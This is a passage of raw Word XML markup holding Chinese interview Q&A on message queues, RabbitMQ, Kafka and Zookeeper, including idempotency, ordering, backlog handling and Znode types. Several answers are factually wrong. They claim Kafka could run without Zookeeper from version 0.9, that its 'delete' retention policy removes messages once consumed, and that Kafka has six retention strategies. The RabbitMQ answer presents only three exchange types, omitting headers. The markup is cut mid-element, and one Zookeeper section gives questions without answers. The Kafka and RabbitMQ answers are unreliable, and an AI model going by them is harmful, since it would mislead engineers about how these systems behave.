          <w:numId w:val="36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故障恢复：在出现故障时，需要及时进行故障排除和恢复。可以使用自动化工具或手动操作来处理故障，确保消息队列能够快速恢复。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为了保证消息队列的高可用性，需要采取多种措施。这些措施包括集群化部署、消息持久化、数据备份、负载均衡、监控和报警以及故障恢复等。只有在全面考虑这些因素的情况下，才能确保消息队列的高可用性和可靠性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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如何保证消息不被重复消费？或者说，如何保证消息消费的幂等性？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保证消息不被重复消费或者保证消息消费的幂等性是消息队列应用中一个非常重要的问题。以下是一些常用的方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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唯一ID标识：在消息中加入一个唯一的ID标识符，当消息被消费后，记录这个标识符并进行标记，下次消费消息时先检查这个标识符是否已经被处理过，如果已经处理过，则不再进行消费。这个方法需要保证唯一ID的生成策略，以及记录标识符的方式必须是持久化的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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去重：使用消息去重的方式，当消息被消费时，先判断该消息是否已经消费过，如果已经消费过，则直接忽略，不再进行消费。这种方式需要记录每个消息的唯一标识符，例如消息的ID或者是消息内容的Hash值，记录在数据库或者缓存中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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幂等性检查：在消费端进行幂等性检查，即在消费消息时先检查该消息是否已经被处理过，如果已经处理过，则不再进行消费。可以根据消息的内容来判断是否重复消费，例如根据消息中的某个字段或者内容的Hash值来判断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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消息超时：在消息中加入一个超时时间，在消息被消费时检查该消息是否已经超时，如果已经超时，则认为该消息已经被消费过，不再进行消费。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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ACK机制：消息队列中常用的ACK机制可以确保消息只被处理一次。当消费者成功处理了一条消息时，向消息队列发送ACK消息，表示这条消息已经被消费成功。如果消费者处理失败，可以使用NACK消息将消息重新放回队列，以便其他消费者再次消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综上所述，保证消息不被重复消费或保证消息的幂等性可以采用多种方式来实现，包括唯一ID标识、消息去重、幂等性检查、消 息超时以及消息ACK机制等。根据具体的应用场景和业务需求，选择适合的方式来保证消息的可靠性和一致性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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如何保证消息的可靠性传输？或者说，如何处理消息丢失的问题？</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保证消息的可靠性传输是消息队列应用中非常重要的问题，而消息丢失是可能会发生的情况，因此需要采取相应的措施来保证消息的可靠性传输和处理消息丢失的问题。以下是一些常用的方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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持久化：消息持久化是一种常用的保证消息可靠性的方法。即当消息被发送到队列中时，将消息存储到持久化存储中，确保即使在消息发送后，如果消息队列出现问题，消息也不会丢失。常用的持久化存储包括数据库、文件系统和云存储等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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消息确认机制：消息队列通常都有消息确认机制，确保消息在被消费者正确处理之后才被标记为已消费。如果消费者处理消息失败，可以使用NACK消息将消息重新放回队列，以便其他消费者再次消费。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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冗余备份：采用冗余备份的方式，将消息队列的数据进行备份，以保证即使某个节点发生故障，数据也能够得到保护和恢复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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消息追踪：消息追踪可以帮助我们快速地定位和处理消息丢失的问题。通过消息追踪，我们可以追踪消息在整个传输过程中的状态，包括消息的发送、接收、处理等状态，从而及时发现和解决消息丢失的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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重试机制：对于消息发送失败的情况，可以采用重试机制，即在消息发送失败后，自动进行多次重试，直到消息发送成功为止。重试机制可以增加消息发送的成功率，减少消息丢失的风险。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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监控告警：在消息队列应用中，监控和告警是非常重要的。通过监控系统，我们可以及时地发现和解决消息丢失的问题，保证消息的可靠性传输。</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保证消息的可靠性传输需要采取多种措施，包括消息持久化、消息确认机制、冗余备份、消息追踪、重试机制以及监控告警等。根据具体的应用场景和业务需求，选择适合的方式来保证消息的可靠性和一致性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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如何保证消息的顺序性？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保证消息的顺序性是消息队列应用中非常重要的问题，因为在一些业务场景下，消息的顺序性是必须要保证的，否则可能会引发一些错误或者不可预测的问题。以下是一些常用的方法来保证消息的顺序性：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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单线程消费：在消息队列中，可以采用单线程消费的方式，即只使用一个消费者来处理消息队列中的所有消息。这样可以保证消息的顺序性，因为每个消息只有在上一个消息被处理完毕之后才能被处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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分区消费：对于消息队列中的消息，可以将其分为多个不同的分区，然后分别对每个分区进行消费。这样可以保证每个分区内的消息顺序性，同时可以并行消费不同的分区，提高消息处理效率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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排序：对于需要保证顺序性的消息，可以在消息发送时，将消息按照一定的规则进行排序，然后按照排序后的顺序发送到消息队列中。消费者在消费消息时，可以按照相同的排序规则进行消费，从而保证消息的顺序性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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时间戳：对于消息队列中的消息，可以在消息发送时，添加一个时间戳，表示消息的发送时间。然后，在消费消息时，可以按照时间戳顺序进行消费，从而保证消息的顺序性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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顺序队列：有些消息队列系统提供了顺序队列的支持，可以保证消息的顺序性。在顺序队列中，每个消息都有一个固定的位置，消费者只能按照这个位置顺序消费消息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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保证一次消费：在消费消息时，可以采用事务的方式，即只有在上一个消息被处理完毕之后才提交事务，从而保证每个消息只被消费一次，保证消息的顺序性。</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综上所述，保证消息的顺序性需要采取多种措施，包括单线程消费、分区消费、消息排序、时间戳、顺序队列以及保证一次消费等。根据具体的应用场景和业务需求，选择适合的方式来保证消息的顺序性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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大量消息在 MQ 里长时间积压，该如何解决？</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当大量消息在MQ中长时间积压时，会导致MQ的性能下降，甚至可能会导致消息堆积严重、系统崩溃等问题。以下是一些可能的解决方法：</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扩容：扩大消息队列的容量或增加队列数量，可以提高系统的吞吐量，减轻消息积压的压力。</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增加消费者：增加消费者可以增加消息的处理速度，减轻消息队列的负载。</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定期清理过期消息：对于长时间积压的消息队列，可以设置过期时间，定期清理过期的消息，以减轻消息队列的负载。</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限流：对于消息队列中的生产者和消费者，可以设置限流机制，限制消息的发送和处理速度，以避免消息积压。</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异步处理：对于某些不紧急的消息，可以采用异步处理的方式，即将消息存储到缓存中，然后再异步地发送到MQ中，以减少消息的直接发送，降低MQ的负载。</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预取机制：对于消息队列中的消费者，可以采用预取机制，即在消费者取走消息之前，预先从MQ中取出一定数量的消息缓存在消费者本地，这样可以减少消费者请求MQ的频率，提高消费者的效率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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定期重启：对于一些大型的消息队列系统，可以定期重启系统，以清理缓存、释放资源等，以减轻系统的负载。</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以上是一些常用的方法，针对具体的应用场景和业务需求，可以采用不同的方法或结合多种方法来解决消息积压的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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MQ 中的消息过期失效了怎么办？</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当MQ中的消息过期失效时，我们可以采取以下几种方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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定期清理：定期清理过期的消息，从而避免它们占据过多的MQ资源。一些MQ系统提供了自动清理过期消息的功能，可以根据配置的过期时间自动删除过期消息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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主动检查：消费者可以主动检查消息是否过期，如果过期则不处理或者丢弃。在消息队列中，每个消息通常都有一个时间戳，消费者可以读取这个时间戳，判断消息是否过期。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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回调处理：某些MQ系统支持回调机制，在消息过期时可以触发回调，通过回调来处理过期消息。例如，可以将过期消息发送到特定的队列或者重新发送到生产者。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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消息重发：当消息过期时，可以将其重新发送到MQ中，以便重新被消费者消费。这通常需要使用消息的唯一标识符或者消息ID来保证消息的幂等性，防止重复消费。</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无论采取哪种方法，都应该在消息过期前尽量确保消息能够及时被消费，从而避免过期失效的问题。如果过期失效的消息对业务造成了重大影响，应该进行相应的分析，找到问题的原因并采取相应的措施来避免类似问题的再次发生</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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RabbitMQ 有哪些重要的角色？</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RabbitMQ 中有以下几个重要的角色：</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生产者（Producer）：向消息队列中发布消息的应用程序或者服务就是生产者。它将消息发送到消息队列中，等待被消费者消费。</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消费者（Consumer）：从消息队列中消费消息的应用程序或者服务就是消费者。它从消息队列中订阅消息，并对其进行处理。</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队列（Queue）：是RabbitMQ中最重要的组件，它是消息的缓存区。生产者将消息发送到队列中，消费者从队列中消费消息。</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交换器（Exchange）：是生产者和队列之间的中介，它接收来自生产者的消息，并将其路由到一个或多个队列中。交换器根据指定的路由键（routing key）和绑定键（binding key）来决定将消息发送到哪些队列中。</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绑定（Binding）：是交换器和队列之间的连接，它指定了消息如何从交换器路由到队列。绑定可以指定路由键，也可以不指定路由键，这样就会将所有从交换器接收到的消息都路由到相应的队列中。</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路由键（Routing Key）：是生产者发送消息时指定的关键字，它用于将消息路由到相应的队列中。路由键与队列之间通过绑定来建立连接。</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连接（Connection）：是RabbitMQ中客户端和服务器之间的TCP连接。客户端和服务器之间可以建立多个连接，每个连接可以使用不同的虚拟主机（vhost）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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虚拟主机（Virtual Host）：是RabbitMQ中的一个逻辑分组机制，用于将不同的应用程序或服务隔离开来。每个虚拟主机都有自己独立的队列、交换器、绑定等组件，不同的虚拟主机之间相互独立，互不影响。</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 RabbitMQ 中的一些重要角色，它们共同构成了 RabbitMQ 的消息传递机制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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RabbitMQ 有哪些重要的组件？</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RabbitMQ 的核心组件包括以下几个：</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Broker：RabbitMQ 的核心组件，它接收来自生产者的消息，并将其路由到一个或多个队列中。在 RabbitMQ 中，Broker 主要由交换器、队列、绑定和消息四个部分组成。</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Exchange（交换器）：生产者将消息发送到交换器中，交换器根据指定的路由键（routing key）和绑定键（binding key）来决定将消息发送到哪些队列中。RabbitMQ 中有四种类型的交换器：direct、fanout、topic 和 headers。</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Queue（队列）：是 RabbitMQ 中最重要的组件，它是消息的缓存区。生产者将消息发送到队列中，消费者从队列中消费消息。队列是一个先进先出（FIFO）的数据结构。</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Binding（绑定）：是交换器和队列之间的连接，它指定了消息如何从交换器路由到队列。绑定可以指定路由键，也可以不指定路由键，这样就会将所有从交换器接收到的消息都路由到相应的队列中。</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Connection（连接）：是 RabbitMQ 中客户端和服务器之间的 TCP 连接。客户端和服务器之间可以建立多个连接，每个连接可以使用不同的虚拟主机（vhost）。</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Channel（信道）：是建立在连接之上的虚拟连接，每个信道之间是相互独立的。在 RabbitMQ 中，客户端和服务器之间的所有交互都是在信道之间进行的。由于信道是轻量级的，因此一个连接可以建立多个信道。</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Virtual Host（虚拟主机）：是 RabbitMQ 中的一个逻辑分组机制，用于将不同的应用程序或服务隔离开来。每个虚拟主机都有自己独立的队列、交换器、绑定等组件，不同的虚拟主机之间相互独立，互不影响。</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Producer（生产者）：向消息队列中发布消息的应用程序或者服务就是生产者。它将消息发送到消息队列中，等待被消费者消费。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>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Consumer（消费者）：从消息队列中消费消息的应用程序或者服务就是消费者。它从消息队列中订阅消息，并对其进行处理。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以上是 RabbitMQ 中的一些重要组件，它们共同构成了 RabbitMQ 的消息传递机制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>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RabbitMQ 有几种广播类型？</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RabbitMQ 中，消息的广播分为三种类型：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Fanout（广播）：将消息广播到所有的消费者。这种类型的消息广播机制类似于发布-订阅模式。生产者将消息发送到一个 fanout 类型的交换器上，交换器会将消息发送到所有与之绑定的队列上，与路由键无关。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Direct（直接）：将消息发送到指定的队列中。这种类型的消息广播机制类似于点对点（P2P）模式。生产者将消息发送到一个 direct 类型的交换器上，交换器会根据消息的路由键将消息发送到与之绑定的队列中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>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Topic（主题）：将消息发送到符合指定规则的队列中。这种类型的消息广播机制类似于订阅者模式。生产者将消息发送到一个 topic 类型的交换器上，交换器会根据消息的路由键将消息发送到符合指定规则的队列中。路由键支持通配符匹配，可以实现复杂的消息路由逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>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Kafka 可以脱离 zookeeper 单独使用吗？为什么？</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Kafka 0.9 版本之前，zookeeper 是 Kafka 的依赖组件，必须与 Kafka 一起部署和运行。zookeeper 主要用于协调集群的状态和配置信息，包括记录 Kafka 集群中的 broker 节点、topic 分区等元数据信息，以及存储 Kafka 的 offset 等信息。</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但自从 Kafka 0.9 版本引入了 Kafka Metadata Protocol 后，Kafka 可以独立于 zookeeper 运行。通过 Kafka Metadata Protocol，Kafka 不再需要 zookeeper 来维护集群状态和元数据信息，而是使用内置的 Kafka Controller 来管理集群状态。</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因此，在 Kafka 0.9 版本及以上的版本中，可以使用 Kafka 自带的元数据管理机制，而不必依赖于 zookeeper，但是 zookeeper 仍然需要用于存储消费者组的 offset 信息。如果你使用 Kafka 中的消费者组管理机制，那么你仍然需要 zookeeper 来存储消费者组的 offset 信息。如果你使用外部的 offset 存储方案，如 Apache Cassandra、Redis 等，那么可以完全脱离 zookeeper 单独使用 Kafka。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>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Kafka 有几种数据保留的策略？</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Kafka 中有 6 种数据保留的策略，分别是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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delete：默认策略。当消息被消费者消费后，该消息将从 Kafka 中删除。这种策略适用于只关心最新数据的场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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compact：开启该策略后，Kafka 将尝试保留最新版本的所有消息，而删除旧版本的消息。该策略适用于需要对消息进行历史记录保留的场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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delete + compact：在该策略下，Kafka 既会删除已被消费的消息，又会尝试保留最新版本的所有消息。该策略适用于需要同时保留历史记录和最新数据的场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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time：该策略基于时间来删除消息。可以设置一个时间阈值，当消息的时间戳小于该阈值时，消息将被删除。该策略适用于只需要保留一定时间范围内的数据的场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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size：该策略基于 Kafka 存储的数据大小来删除消息。可以设置一个存储大小的阈值，当 Kafka 中的存储空间超过该阈值时，Kafka 将删除一些旧的消息。该策略适用于需要限制 Kafka 存储空间的场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>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size + time：在该策略下，Kafka 既会基于存储大小来删除消息，又会基于时间来删除消息。当 Kafka 存储的数据大小超过阈值或消息的时间戳早于阈值时，Kafka 将删除一些旧的消息。该策略适用于需要同时限制存储空间和数据保存时间的场景</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Kafka 的分区策略有哪些？</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谈下你对 Zookeeper 的认识？</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Zookeeper 都有哪些功能？</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谈下你对 ZAB 协议的了解？</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Zookeeper 怎么保证主从节点的状态同步？</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Zookeeper 有几种部署模式？</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说一下 Zookeeper 的通知机制？</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集群中为什么要有主节点？</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集群中有 3 台服务器，其中一个节点宕机，这个时候 Zookeeper 还可以使用吗？</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说一下两阶段提交和三阶段提交的过程？分别有什么问题？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>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Zookeeper 宕机如何处理？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Zookeeper 的高可用性是通过构建一个 Zookeeper 集群来实现的，当一个 Zookeeper 服务器宕机时，其他 Zookeeper 服务器会接管其工作，以保证整个集群的正常运行。</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当 Zookeeper 集群中的某个节点宕机时，Zookeeper 集群会自动将宕机节点的工作转</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>移到其他节点上，因此只要 Zookeeper 集群中超过半数的节点正常运行，整个集群就可以继续提供服务。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如果 Zookeeper 集群中超过半数的节点都宕机了，整个集群就无法提供服务。在这种情况下，需要重新启动 Zookeeper 集群，并确保集群中的超过半数的节点正常运行，才能恢复 Zookeeper 的服务。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此外，为了进一步提高 Zookeeper 的可用性，还可以使用一些辅助工具，如监控工具、集群管理工具等，帮助及时发现和解决问题，保证 Zookeeper 的高可用性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="384"/>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说下四种类型的数据节点 Znode？</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Zookeeper 中，Znode 是 Zookeeper 中的一个基本概念，它是 Zookeeper 中存储数据的基本单位。Znode 是一个类似于文件和目录的节点结构，每个 Znode 都可以存储一些数据，并且可以有子节点，通过节点路径来唯一标识。</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Zookeeper 中，有四种类型的 Znode，分别是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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持久节点（Persistent Znode）：持久节点在创建后，会一直存在于 Zookeeper 中，直到被主动删除。这种节点的数据会一直保存在 Zookeeper 中，即使创建该节点的客户端与 Zookeeper 的连接断开，数据也不会丢失。持久节点在服务端创建后，即使客户端与服务端的连接断开，该节点也会一直存在于 Zookeeper 中，直到被删除。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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持久顺序节点（Persistent Sequential Znode）：持久顺序节点和持久节点的功能相同，但是会给节点名称添加一个自增的数字后缀。这样就可以保证在相同父节点下，每个节点的名称是唯一的，并且节点的名称是有序的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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临时节点（Ephemeral Znode）：临时节点的生命周期和客户端的连接是绑定在一起的，当客户端与 Zookeeper 的连接断开时，该节点也会被自动删除。临时节点通常用于实现锁和会话管理等功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="385"/>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30" w:lineRule="atLeast"/>
        <w:ind w:left="420" w:right="0" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>临时顺序节点（Ephemeral Sequential Znode）：临时顺序节点和临时节点的功能相同，但是会给节点名称添加一个自增的数字后缀。这样就可以保证在相同父节点下，每个节点的名称是唯一的，并且节点的名称是有序的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>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27" w:lineRule="atLeast"/>
        <w:ind w:left="420" w:right="0" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="FF0C0C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Zookeeper 和 Dubbo 的关系？</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Zookeeper 是一个开源的分布式协调服务框架，提供了一些分布式应用场景下的协调服务，例如服务注册与发现、分布式锁、分布式队列等。Dubbo 是一个高性能的 Java RPC 框架，用于构建分布式服务应用。</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18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在 Dubbo 中，Zookeeper 用于实现服务注册与发现的功能。服务提供者会将自己的服务地址和元数据注册到 Zookeeper 中，而服务消费者则可以通过 Zookeeper 发现并调用这些服务。Dubbo 通过 Zookeeper 的 Watcher 机制实现了服务的动态感知和自动切换，保证了服务的高可用性和负载均衡。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
